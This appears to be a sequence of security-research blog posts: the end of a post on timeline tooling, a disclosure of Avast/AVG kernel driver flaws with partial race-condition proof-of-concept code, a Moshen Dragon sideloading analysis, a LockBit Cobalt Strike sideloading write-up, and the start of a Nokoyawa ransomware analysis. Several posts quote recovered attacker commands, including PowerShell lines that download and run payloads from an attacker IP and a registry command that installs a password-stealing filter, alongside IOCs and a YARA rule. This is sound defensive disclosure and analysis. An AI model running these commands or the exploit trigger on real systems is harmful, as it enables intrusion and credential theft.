I recommend exploring the bottom right and left options to best display the information to your liking. Zooming in for specific dates and out for high level overviews (like above). This above timeline expands to a view of months and indicates precise days with vertical lines. However, if you are using a timeline for something like an intrusion analysis, you will likely find value in using a deeper precision like minutes.

Personally, my workflow for the Ukraine events was kept rather manual because of my desire to review, understand, and expand each event when possible. However, as you begin using the application you will quickly find the option to bulk import data, which may now feel similar to something like Maltego.

Additionally, when it comes to customizing properties, it all depends on what you could find useful. For example, if I’m particularly interested in tracking the target organization or attacker by event, simply add it as a property of the data. To do this, click the top right ⚙ (Settings), Data Types > Edit > Properties.

Adding Target and Attacker properties

Mastering The Mind Map

On a much different level, one other great area of the product I make use of is the mind map. My use of a mind map is of course more related to the discovery of relationships rather than time of events. Generally speaking, the mind map is my go-to for connecting the dots between the larger and more complex bits of threat activity. A mind map was instrumental in my research on ModifiedElephant.

The template shared in this blog post will be a great starting point for your own mind map use. To get started, open a new project using the template, then navigate to the top mind map section. Double-click in the empty map to add your first entity. Once multiple entities exist, you can connect the two by forming a line relationship. The entity types and relationships are built into our template, so you can customize to your liking.

Here is a quick example of how one could use the mind map to quickly map out some activity while also noting potential assessments of confidence. Note that we have a domain IOC which is related with high confidence to an IP and email. Those then further relate to the infamous APT41.

Mind Map example, clean and organized

To modify all the data types (IOCs in this case), Relationships (confidence levels), or properties of the data, again navigate to the advanced settings: ⚙ > Data Types > Edit.

It’s also worth noting that a mind map does not need to be highly organized and clean. Sometimes if I’m moving fast, a mind map just to keep track of my findings is often good enough to avoid forgetting something. However, if you plan on maintaining the map over time rather than a quick project, I recommend avoiding such methods or you could end up with something less than helpful like the one below.

Messy mind map – does it help or hinder?

Custom Template – Download and Open

Below you will find an example timeline and mind map, but I also highly recommend exploring the official training material on the Aeon website in order to understand more of the tools capabilities.

After installing Aeon, download our template file and save it locally. With Aeon running, navigate to the program preferences and select custom templates. Here is where you can import the SentinelLabs template you previously downloaded.

Import Aeon Template

On the main page of Aeon, select Create New > Custom, and you should see an entry for the template, which is preconfigured with common IOC types used in the practice of security research. The template is completely customizable to your personal needs, but the setup provided should be enough to get you started.

Template IOCs and Configuration

You are now ready to use the tool for some interesting threat research use cases.

Conclusion

Analysts, researchers, incident responders, and any other form of investigator can derive a lot of value from this tool. If you want to get started, download the template and the UA/RU timeline to explore the data.

The use of timelines in the researcher workflow is a powerful tool that can help enable the identification of new context. I hope the examples shared here may motivate others to adopt them as a useful addition to their toolkit and industry collaboration efforts.

✇SentinelLabs

Vulnerabilities in Avast And AVG Put Millions At Risk

By: Kasif Dekel

Executive Summary

  • SentinelLabs has discovered two high severity flaws in Avast and AVG (acquired by Avast in 2016) that went undiscovered for years affecting dozens of millions of users.
  • These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to Avast during December 2021 and the vulnerabilities are tracked as CVE-2022-26522 and CVE-2022-26523.
  • Avast has silently released security updates to address these vulnerabilities.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Avast’s “Anti Rootkit” driver (also used by AVG) has been found to be vulnerable to two high severity attacks that could potentially lead to privilege escalation by running code in the kernel from a non-administrator user. Avast and AVG are widely deployed products, and these flaws have potentially left many users worldwide vulnerable to cyber attacks.

Given that these products run as privileged services on Windows devices, such bugs in the very software that is intended to protect users from harm present both an opportunity to attackers and a grave threat to users.

Security products such as these run at the highest level of privileges and are consequently highly attractive to attackers, who often use such vulnerabilities to carry out sophisticated attacks. Vulnerabilities such as this and others discovered by SentinelLabs (1, 2, 3) present a risk to organizations and users deploying the affected software.

As we reported recently, threat actors will exploit such flaws given the opportunity, and it is vital that affected users take appropriate mitigation actions. According to Avast, the vulnerable feature was introduced in Avast 12.1. Given the longevity of this flaw, we estimate that millions of users were likely exposed.

Security products ensure device security and are supposed to prevent such attacks from happening, but what if the security product itself introduces a vulnerability? Who’s protecting the protectors?

CVE-2022-26522

The vulnerable routine resides in a socket connection handler in the kernel driver aswArPot.sys. Since the two reported vulnerabilities are very similar, we will primarily focus on the details of CVE-2022-26522.

CVE-2022-26522 refers to a vulnerability that resides in aswArPot+0xc4a3.

As can be seen in the image above, the function first attaches the current thread to the target process, and then uses nt!PsGetProcessPeb to obtain a pointer to the current process PEB (red arrow). It then fetches (first time) PPEB->ProcessParameters->CommandLine.Length to allocate a new buffer (yellow arrow). It then copies the user supplied buffer at PPEB->ProcessParameters->CommandLine.Buffer with the size of PPEB->ProcessParameters->CommandLine.Length (orange arrow), which is the first fetch.

During this window of opportunity, an attacker could race the kernel thread and modify the Length variable.

Looper thread:

  PTEB tebPtr = reinterpret_cast(__readgsqword(reinterpret_cast(&static_cast<NT_TIB*>(nullptr)->Self)));
    PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;
 
    pebPtr->ProcessParameters->CommandLine.Length = 2;
   
    while (1) {
        pebPtr->ProcessParameters->CommandLine.Length ^= 20000;
    }

As can be seen from the code snippet above, the code obtains a pointer to the PEB structure and then flips the Length field in the process command line structure.

The vulnerability can be triggered inside the driver by initiating a socket connection as shown by the following code.

   printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("Failed. Error Code : %d", WSAGetLastError());
        return 1;
    }
 
    printf("Initialised.\n");
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Could not create socket : %d", WSAGetLastError());
    }
    printf("Socket created.\n");
 
 
    server.sin_addr.s_addr = inet_addr(IP_ADDRESS);
    server.sin_family = AF_INET;
    server.sin_port = htons(80);
 
    if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0) {
        puts("connect error");
        return 1;
    }
 
    puts("Connected");
 
    message = (char *)"GET / HTTP/1.1\r\n\r\n";
    if (send(s, message, strlen(message), 0) < 0) {
        puts("Send failed");
        return 1;
    }
    puts("Data Sent!\n");

So the whole flow looks like this:

Once the vulnerability is triggered, the user sees the following alert from the OS.

CVE-2022-26523

The second vulnerable function is at aswArPot+0xbb94 and is very similar to the first vulnerability. This function double fetches the Length field from a user controlled pointer, too.

This vulnerable code is a part of several handlers in the driver and, therefore, can be triggered multiple ways such as via image load callback.

Both of these vulnerabilities were fixed in version 22.1.

Impact

Due to the nature of these vulnerabilities, they can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, the vulnerabilities could be exploited as part of a second stage browser attack or to perform a sandbox escape, among other possibilities.

As we have noted with similar flaws in other products recently (1, 2, 3), such vulnerabilities have the potential to allow complete take over of a device, even without privileges, due to the ability to execute code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

Mitigation

The majority of Avast and AVG users will receive the patch (version 22.1) automatically; however, those using air gapped or on premise installations are advised to apply the patch as soon as possible.

Conclusion

These high severity vulnerabilities, affect millions of users worldwide. As with another vulnerability SentinelLabs disclosed that remained hidden for 12 years, the impact this could have on users and enterprises that fail to patch is far reaching and significant.

While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, with dozens of millions of users affected, it is possible that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action.

As part of the commitment of SentinelLabs to advancing industry security, we actively invest in vulnerability research, including advanced threat modeling and vulnerability testing of various platforms and technologies.

We would like to thank Avast for their approach to our disclosure and for quickly remediating the vulnerabilities.

Disclosure Timeline

  • 20 December, 2021 – Initial disclosure.
  • 04 January, 2022 – Avast acknowledges the report.
  • 11 February, 2022 – Avast notifies us that the vulnerabilities are fixed.

✇SentinelLabs

Moshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad

By: Joey Chen

By Joey Chen and Amitai Ben Shushan Ehrlich

Executive Summary

  • SentinelLabs researchers are tracking the activity of a Chinese-aligned cyberespionage threat actor operating in Central-Asia, dubbed ‘Moshen Dragon’.
  • As the threat actor faced difficulties loading their malware against the SentinelOne agent, we observed an unusual approach of trial-and-error abuse of traditional antivirus products to attempt to sideload malicious DLLs.
  • Moshen Dragon deployed five different malware triads in an attempt to use DLL search order hijacking to sideload ShadowPad and PlugX variants.
  • Moshen Dragon deploys a variety of additional tools, including an LSA notification package and a passive backdoor known as GUNTERS.

Overview

SentinelLabs recently uncovered a cluster of activity targeting the telecommunication sector in Central Asia, utilizing tools and TTPs commonly associated with Chinese APT actors. The threat actor systematically utilized software distributed by security vendors to sideload ShadowPad and PlugX variants. Some of the activity partially overlaps with threat groups tracked by other vendors as RedFoxtrot and Nomad Panda. We track this cluster of activity as ‘Moshen Dragon’.

Usually, good detection has an inverse relationship with visibility of a threat actor’s TTPs. When part of an infection chain gets detected, it usually means that we don’t get to see what the threat actor intended to deploy or ultimately do. In an unexpected twist, our detection capabilities uncovered an unusual TTP as Moshen Dragon attempted to repeatedly bypass that detection.

Every time the intended payload was blocked, we were able to witness the actor’s reliance on a wide variety of legitimate software leveraged to sideload ShadowPad and PlugX variants. Many of these hijacked programs belong to security vendors, including Symantec, TrendMicro, BitDefender, McAfee and Kaspersky.

Rather than criticize any of these products for their abuse by an insistent threat actor, we remind readers that this attack vector reflects an age-old design flaw in the Windows Operating System that allows DLL search order hijacking. Tracking of additional Moshen Dragon loading mechanisms and hijacked software surfaced more payloads uploaded to VirusTotal, some of which were recently published under the name ‘Talisman’.

In addition to ShadowPad and the PlugX Talisman variant, the Moshen Dragon deployed a variety of other tools, including an LSA notification package to harvest credentials and a passive loader dubbed GUNTERS by Avast. Despite all of this visibility, we are still unable to determine their main infection vector. Their concerted efforts include the use of known hacking tools, red team scripts, and on-keyboard attempts at lateral movement and data exfiltration.

We will focus on the actor’s insistent abuse of different AV products to load malicious payloads in an attempt to ‘bruteforce’ infection chains that would go undetected by traditional SOC and MDR solutions.

Hijacking Security Products

Moshen Dragon actors systematically abused security software to perform DLL search order hijacking. The hijacked DLL is in turn used to decrypt and load the final payload, stored in a third file residing in the same folder. This combination is recognized as a sideloading triad, a technique commonly associated with Lucky Mouse.

The way the payloads were deployed, as well as other actions within target networks, suggest the threat actor uses IMPACKET for lateral movement. Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.

Execution flow of hijacked software as carried out by Moshen Dragon

As major portions of the Moshen Dragon activity were identified and blocked, the threat actor consistently deployed new malware, using five different security products to sideload PlugX and ShadowPad variants.

A summary of the hijacked software is presented in the table below:

Product Path
Symantec SNAC C:\Windows\AppPatch, C:\ProgramData\SymantecSNAC, C:\ProgramData\Symantec\SNAC, C:\Windows\Temp
TrendMicro Platinum Watch Dog C:\Windows\ AppPatch
BitDefender SSL Proxy Tool C:\ProgramData\Microsoft\Windows, C:\ProgramData\Microsoft\Windows\LfSvc, C:\ProgramData\Microsoft\Windows\WinMSIPC, C:\ProgramData\Microsoft\Windows\ClipSVC, C:\ProgramData\Microsoft\Wlansvc, C:\ProgramData\Microsoft\Windows\Ringtones
McAfee Agent C:\ProgramData\McAfee, C:\ProgramData\Microsoft\WwanSvc, C:\ProgramData\Microsoft\WinMSIPC
Kaspersky Anti-Virus Launcher C:\ProgramData\Microsoft\XboxLive, C:\programdata\GoogleUpdate

Lateral Movement Using Impacket

Impacket is a collection of Python classes for working with network protocols, commonly utilized by threat actors for lateral movement. One of the favorite tools in the Impacket arsenal is wmiexec, which enables remote code execution via WMI. An effective way to identify wmiexec execution is searching for the unique command line pattern it creates. Moshen Dragon activities are rife with this pattern.

Lateral Movement utilizing Impacket as identified by the SentinelOne Agent

LSA Notification Package – SecureFilter

When on domain controllers, Moshen Dragon dropped a password filter and loaded it into the lsass process via LSA Notification packages. Impacket is used in the following manner:

cmd.exe /Q /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "rassfm\0scecli\0SecureFilter" /f 1> \\127.0.0.1\ADMIN$\__[REDACTED] 2>&1

The DLL deployed is dropped in the path C:\Windows\System32\SecureFilter.dll in order to enable loading using the Notification Package feature. The DLL seems to rely on an open source project named DLLPasswordFilterImplant, effectively writing changed user passwords to the file C:\Windows\Temp\Filter.log.

Snippet from SecureFilter.dll

GUNTERS – A Passive Loader

During our analysis of Moshen Dragon’s activities, we came across a passive loader previously discussed by Avast as ‘GUNTERS’. This backdoor appears to be highly targeted as it performs checks to verify that it is executed on the right machine.

Before execution, the malware calculates the hash of the machine hostname and compares it to a hardcoded value, suggesting that the threat actor generates a different DLL for each target machine.

The loader utilized WinDivert to intercept incoming traffic, searching for a magic string to initiate a decrypting process utilizing a custom protocol. Following the decryption process, the malware attempts to load a PE file with an exported function named SetNtApiFunctions, which it calls to launch the payload.

Exported functions of an internal GUNTERS resource utilized in the loading process

A thorough analysis of the custom protocol and loading mechanism is available here.

Additional Payloads

SentinelLabs came across additional related artifacts overlapping with this threat cluster. It’s possible that some of those were utilized by Moshen Dragon or a related actor.

File name SHA1 C&C
SNAC.log e9e8c2e720f5179ff1c0ac30ce017224ac0b2f1b freewula.strangled.net szuunet.strangled.net
SNAC.log b6c6c292cbd35298a5f055448177bcfd5d0b23bf final.staticd.dynamic-dns.net
SNAC.log 2294ecbbb065c517bd0e01f3f01aabd0a0402f5a dhsg123.jkub.com
bdch.tmp 7021a62b68751b7a3a2984b2996139aca8d19fec greenhugeman.dns04.com

After analyzing these payloads, we found them to be additional PlugX and ShadowPad variants. SNAC.log payloads have been identified by other researchers as Talisman, which is known to be another variant of PlugX. In addition, the bdch.tmp payload was produced by shellcode with a structure similar to ShadowPad malware but without the initial code obfuscation and decryption logic typically seen in ShadowPad.

Conclusion

PlugX and Shadowpad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity. Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products.

Here we focused on Moshen Dragon TTPs observed during an unusual engagement that forced the threat actor to conduct multiple phases of trial-and-error to attempt to deploy their malware. Once the attackers have established a foothold in an organization, they proceed with lateral movement by leveraging Impacket within the network, placing a passive backdoor into the victim environment, harvesting as many credentials as possible to insure unlimited access, and focusing on data exfiltration.

SentinelLabs continue to monitor Moshen Dragon activity as it unfolds.

Indicators of Compromise

Hijacked DLLs

  • ef3e558ecb313a74eeafca3f99b7d4e038e11516
  • 3c6a51961aa328ba507796153234309a5e83bee3
  • fae572ad1beab78e293f756fd53cf71963fdb1bd
  • 308ed56dc1fbc98b574f937d4b005190c878416f
  • 55e89f458b5f5642300dd7c50b444232e37c3fa7

Payloads

  • e9e8c2e720f5179ff1c0ac30ce017224ac0b2f1b
  • b6c6c292cbd35298a5f055448177bcfd5d0b23bf
  • 2294ecbbb065c517bd0e01f3f01aabd0a0402f5a
  • 7021a62b68751b7a3a2984b2996139aca8d19fec

Password Filter

  • c4f1177f68676b770934b142f9c3e2c4eff7f164

GUNTERS

  • bb68816f324f2ac4f0d4756b66af67d01c8b6e4e
  • 4025e14a7f8928753ba06ad155944624069497dc
  • f5b8ab4a7d9c723c2b3b842b49f66da2e1697ce0

Infrastructure

  • freewula.strangled[.]net
  • szuunet.strangled[.]net
  • final.staticd.dynamic-dns[.]net
  • dhsg123.jkub[.]com
  • greenhugeman.dns04[.]com
  • gfsg.chickenkiller[.]com
  • pic.farisrezky[.]com

✇SentinelLabs

LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility

By: James Haughom

By James Haughom, Júlio Dantas, and Jim Walter

Executive Summary

  • The VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is susceptible to DLL side-loading.
  • During a recent investigation, our DFIR team discovered that LockBit Ransomware-as-a-Service (Raas) side-loads Cobalt Strike Beacon through a signed VMware xfer logs command line utility.
  • The threat actor uses PowerShell to download the VMware xfer logs utility along with a malicious DLL, and a .log file containing an encrypted Cobalt Strike Reflective Loader.
  • The malicious DLL evades defenses by removing EDR/EPP’s userland hooks, and bypasses both Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI).
  • There are suggestions that the side-loading functionality was implemented by an affiliate rather than the Lockbit developers themselves (via vx-underground), likely DEV-0401.

Overview

LockBit is a Ransomware as a Service (RaaS) operation that has been active since 2019 (previously known as “ABCD”). It commonly leverages the double extortion technique, employing tools such as StealBit, WinSCP, and cloud-based backup solutions for data exfiltration prior to deploying the ransomware. Like most ransomware groups, LockBit’s post-exploitation tool of choice is Cobalt Strike.

During a recent investigation, our DFIR team discovered an interesting technique used by LockBit Ransomware Group, or perhaps an affiliate, to load a Cobalt Strike Beacon Reflective Loader. In this particular case, LockBit managed to side-load Cobalt Strike Beacon through a signed VMware xfer logs command line utility.

Since our initial publication of this report, we have identified a connection with an affiliate Microsoft tracks as DEV-0401. A switch to LockBit represents a notable departure in DEV-0401’s previously observed TTPs.

Side-loading is a DLL-hijacking technique used to trick a benign process into loading and executing a malicious DLL by placing the DLL alongside the process’ corresponding EXE, taking advantage of the DLL search order. In this instance, the threat actor used PowerShell to download the VMware xfer logs utility along with a malicious DLL, and a .log file containing an encrypted Cobalt Strike Reflective Loader. The VMware utility was then executed via cmd.exe, passing control flow to the malicious DLL.

The DLL then proceeded to evade defenses by removing EDR/EPP’s userland hooks, as well as bypassing both Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI). The .log file was then loaded in memory and decrypted via RC4, revealing a Cobalt Strike Beacon Reflective Loader. Lastly, a user-mode Asynchronous Procedure Call (APC) is queued, which is used to pass control flow to the decrypted Beacon.

Attack Chain

The attack chain began with several PowerShell commands executed by the threat actor to download three components, a malicious DLL, a signed VMwareXferlogs executable, and an encrypted Cobalt Strike payload in the form of a .log file.

Filename Description
glib-2.0.dll Weaponized DLL loaded by VMwareXferlogs.exe
VMwareXferlogs.exe Legitimate/signed VMware command line utility
c0000015.log Encrypted Cobalt Strike payload

Our DFIR team recovered the complete PowerShell cmdlets used to download the components from forensic artifacts.

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\windows\debug\glib-2.0.dll;

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/c0000015.log -OutFile c:\windows\debug\c0000015.log;

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:\windows\debug\VMwareXferlogs.exe;c:\windows\debug\VMwareXferlogs.exe

The downloaded binary (VMwareXferlogs.exe) was then executed via the command prompt, with the STDOUT being redirected to a file.

c:\windows\debug\VMwareXferlogs.exe 1> 
\\127.0.0.1\ADMIN$\__1649832485.0836577 2>&1

The VMwareXferlogs.exe is a legitimate, signed executable belonging to VMware.

VirusTotal Signature Summary

This utility is used to transfer data to and from VMX logs.

VMware xfer utility command line usage

This command line utility makes several calls to a third party library called glib-2.0.dll. Both the utility and a legitimate version of glib-2.0.dll are shipped with VMware installations.

glib-2.0.dll functions being called by VMwareXferlog.exe

The weaponized glib-2.0.dll downloaded by the threat actor exports all the necessary functions imported by VMwareXferlog.exe.

Exported functions of malicious glib-2.0.dll
glib-2.0.dll-related functions imported by VMwareXferlog.exe

Calls to exported functions from glib-2.0.dll are made within the main function of the VMware utility, the first being g_path_get_basename().

glib-2.0.dll functions being called by VMwareXferlog.exe

Note that the virtual addresses for the exported functions are all the same for the weaponized glib-2.0.dll (0x1800020d0), except for g_path_get_basename, which has a virtual address of 0x180002420. This is due to the fact that all exports, except for the g_path_get_basename function do nothing other than call ExitProcess().

g_error_free() function’s logic

On the other hand, g_path_get_basename() invokes the malicious payload prior to exiting.

When VMwareXferlog.exe calls this function, control flow is transferred to the malicious glib-2.0.dll, rather than the legitimate one, completing the side-loading attack.

g_path_get_basename() being called in the main() function

Once control flow is passed to the weaponized DLL, the presence of a debugger is checked by querying the BeingDebugged flag and NtGlobalFlag in the Process Environment Block (PEB). If a debugger is detected, the malware enters an endless loop.

Anti-debug mechanisms

Bypassing EDR/EPP Userland Hooks

At this juncture, the malware enters a routine to bypass any userland hooks by manually mapping itself into memory, performing a byte-to-byte inspection for any discrepancies between the copy of self and itself, and then overwriting any sections that have discrepancies.

This routine is repeated for all loaded modules, thus allowing the malware to identify any potential userland hooks installed by EDR/EPP, and overwrite them with the unpatched/unhooked code directly from the modules’ images on disk.

Checking for discrepancies between on-disk and in-memory for each loaded module

For example, EDR’s userland NT layer hooks may be removed with this technique. The below subroutine shows a trampoline where a SYSCALL stub would typically reside, but instead jumps to a DLL injected by EDR. This subroutine will be overwritten/restored to remove the hook.

EDR-hooked SYSCALL stub that will be patched

Here is a look at the patched code to restore the original SYSCALL stub and remove the EDR hook.

NT layer hook removed and original code restored

Once these hooks are removed, the malware continues to evade defenses. Next, an attempt to bypass Event Tracing for Windows (ETW) commences through patching the EtwEventWrite WinAPI with a RET instruction (0xC3), stopping any useful ETW-related telemetry from being generated related to this process.

Event Tracing for Windows bypass

AMSI is bypassed the same way as ETW through patching AmsiScanBuffer. This halts AMSI from inspecting potentially suspicious buffers within this process.

AMSI bypass

Once these defenses have been bypassed, the malware proceeds to execute the final payload. The final payload is a Cobalt Strike Beacon Reflective Loader that is stored RC4-encrypted in the previously mentioned c0000015.log file. The RC4 Key Scheduling Algorithm can be seen below with the hardcoded 136 byte key.

&.5 \C3%YHO2SM-&B3!XSY6SV)6(&7;(3.'
$F2WAED>>;K]8\*D#[email protected](R,+]A-G\D
HERIP:45:X(WN8[?3Y>XCWNPOL89>[.# Q'
4CP8M-%4N[7.$R->-1)$!NU"W$!YT<J$V[
RC4 Key Scheduling Algorithm

The RC4 decryption of the payload then commences.

RC4 decryption routine

The final result is Beacon’s Reflective Loader, seen below with the familiar magic bytes and hardcoded strings.

Decrypted Cobalt Strike Beacon Reflective Loader

Once decrypted, the region of memory that the payload resides in is made executable (PAGE_EXECUTE_READWRITE), and a new thread is created for this payload to run within.

This thread is created in a suspended state, allowing the malware to add a user-mode APC, pointing to the payload, to the newly created thread’s APC queue. Finally, the thread is resumed, allowing the thread to run and execute the Cobalt Strike payload via the APC.

Logic to queue and execute user-mode APC

The DLL is detected by the SentinelOne agent prior to being loaded and executed.

Detection for LockBit DLL

VMware Side-loading Variants

A handful of samples related to the malicious DLL were discovered by our investigation. The only notable differences being the RC4 key and name of the file containing the RC4-encrypted payload to decrypt.

For example, several of the samples attempt to load the file vmtools.ini rather than c0000015.log.

The vmtools.ini file being accessed by a variant

Another variant shares the same file name to load vmtools.ini, yet is packed with a custom version of UPX.

Tail jump at the end of the UPX unpacking stub

Conclusion

The VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is susceptible to DLL side-loading. In our engagement, we saw that the threat actor had created a malicious version of the legitimate glib-2.0.dll to only have code within the g_path_get_basename() function, while all other exports simply called ExitProcess(). This function invokes a malicious payload which, among other things, attempts to bypass EDR/EPP userland hooks and engages in anti-debugging logic.

LockBit continues to be a successful RaaS and the developers are clearly innovating in response to EDR/EPP solutions. We hope that by describing this latest technique, defenders and security teams will be able to improve their ability to protect their organizations.

Indicators of Compromise

SHA1 Description
729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll from investigation
091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload
e35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log
25fbfa37d5a01a97c4ad3f0ee0396f953ca51223 glib-2.0.dll vmtools.ini variant
0c842d6e627152637f33ba86861d74f358a85e1f glib-2.0.dll vmtools.ini variant
1458421f0a4fe3acc72a1246b80336dc4138dd4b glib-2.0.dll UPX-packed vmtools.ini variant
File Path Description
c:\windows\debug\VMwareXferlogs.exe Full path to legitimate VMware command line utility
c:\windows\debug\glib-2.0.dll Malicious DLL used for hijack
c:\windows\debug\c0000015.log Encrypted Cobalt Strike reflective loader
C2 Description
149.28.137[.]7 Cobalt Strike C2
45.32.108[.]54 Attacker C2

YARA Hunting Rules

import "pe"

rule Weaponized_glib2_0_dll
{
	meta:
		description = "Identify potentially malicious versions of glib-2.0.dll"
		author = "James Haughom @ SentinelOne"
		date = "2022-04-22"
		reference = "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/"

	/*
		The VMware command line utilty 'VMwareXferlogs.exe' used for data
		transfer to/from VMX logs is susceptible to DLL sideloading. The
		malicious versions of this DLL typically only have code within 
		the function 'g_path_get_basename()' properly defined, while the
		rest will of the exports simply call 'ExitProcess()'.  Notice how
		in the exports below, the virtual address for all exported functions
		are the same except for 'g_path_get_basename()'. We can combine this
		along with an anomalously low number of exports for this DLL, as
		legit instances of this DLL tend to have over 1k exports.

		[Exports]

		nth paddr      vaddr       bind   type size lib          name
		―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
		1   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_error_free
		2   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_free
		3   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_add_main_entries
		4   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_free
		5   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_get_help
		6   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_new
		7   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_parse
		8   0x00001820 0x180002420 GLOBAL FUNC 0    glib-2.0.dll g_path_get_basename
		9   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_print
		10  0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_printerr
		11  0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_set_prgname


		This rule will detect malicious versions of this DLL by identifying
		if the virtual address is the same for all of the exported functions
		used by 'VMwareXferlogs.exe' except for 'g_path_get_basename()'.
	*/

	condition:
		/* sample is an unsigned DLL */
		pe.characteristics & pe.DLL and pe.number_of_signatures == 0 and

		/* ensure that we have all of the exported functions of glib-2.0.dll imported by VMwareXferlogs.exe */
		pe.exports("g_path_get_basename") and
		pe.exports("g_error_free") and
		pe.exports("g_free") and
		pe.exports("g_option_context_add_main_entries") and
		pe.exports("g_option_context_get_help") and
		pe.exports("g_option_context_new") and
		pe.exports("g_print") and
		pe.exports("g_printerr") and
		pe.exports("g_set_prgname") and
		pe.exports("g_option_context_free") and
		pe.exports("g_option_context_parse") and

		/* all exported functions have the same offset besides g_path_get_basename */
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_error_free")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_get_help")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_new")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_add_main_entries")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_print")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_printerr")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_set_prgname")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_free")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_parse")].offset and
		pe.export_details[pe.exports_index("g_free")].offset != pe.export_details[pe.exports_index("g_path_get_basename")].offset and

		/* benign glib-2.0.dll instances tend to have ~1k exports while malicious ones have the bare minimum */
		pe.number_of_exports 

MITRE ATT&CK TTPs

TTP MITRE ID
Encrypted Cobalt Strike payload T1027
DLL Hijacking T1574
ETW Bypass T1562.002
AMSI Bypass T1562.002
Unhooking EDR T1562.001
Encrypted payload T1027.002
Powershell usage T1059.001
Cobalt Strike S0154

✇SentinelLabs

Nokoyawa Ransomware | New Karma/Nemty Variant Wears Thin Disguise

By: Antonis Terefos

Executive Summary

  • At the beginning of February 2022, SentinelLabs observed two samples of a new Nemty variant dubbed “Nokoyawa” (sample 1, 2).
  • SentinelLabs consider Nokoyawa to be an evolution of the previous Nemty strain, Karma.
  • The developers have attempted to enhance code responsible for excluding folders from encryption, but SentinelLabs analysis finds that the algorithm contains logical flaws.
  • In March, TrendMicro suggested this ransomware bore some relation to Hive. We assess that Hive and Nokoyawa are different and that the latter is not a rebrand of Hive RaaS.

Overview

In this post, we take a broader look at the similarities between Nokoyawa and Karma ransomware. Previous researchers have highlighted similarities in the attack chain between Nokoyawa and Hive ransomware, concluding that “Nokoyawa is likely connected with Hive, as the two families share some striking similarities in their attack chain, from the tools used to the order in which they execute various steps.” Our analysis contradicts that finding, and we assess Nokoyawa is clearly an evolution of Karma (Nemty), bearing no major code similarities to Hive.

Nokoyawa and Karma Variant Similarities

Both Nokoyawa and Karma variants manage multi-threaded encryption by creating an input/output (I/O) completion port (CreateIoCompletionPort), which allows communication between the thread responsible for the enumeration of files and the sub-threads (“2 * NumberOfProcessors”) responsible for the file encryption.

Nokyoawa (left) vs Karma, initialization of encryption threads

In both cases, public keys for the encryption and ransom note are encoded with Base64.

Like Karma, Nokoyawa accepts different command line parameters, although in the latter they are documented by the developer via a -help command.

Nokoyawa command line support

Aside from the -help command, three other commands (-network, -file, and -dir) are also provided.

Parameter Functionality
-help Prints command line options for execution of ransomware.
-network Encrypts local and network shares.
-file Encrypts specified file.
-dir Encrypts specified directory.

If the ransomware is executed without any parameter, it then encrypts the machine without enumerating and encrypting network resources.

One new parameter not observed in the Karma version is -network, which is responsible for encrypting network shares. Network enumeration is achieved by calling WNetOpenEnumW, WNetEnumResourceW, and WNetCloseEnum.

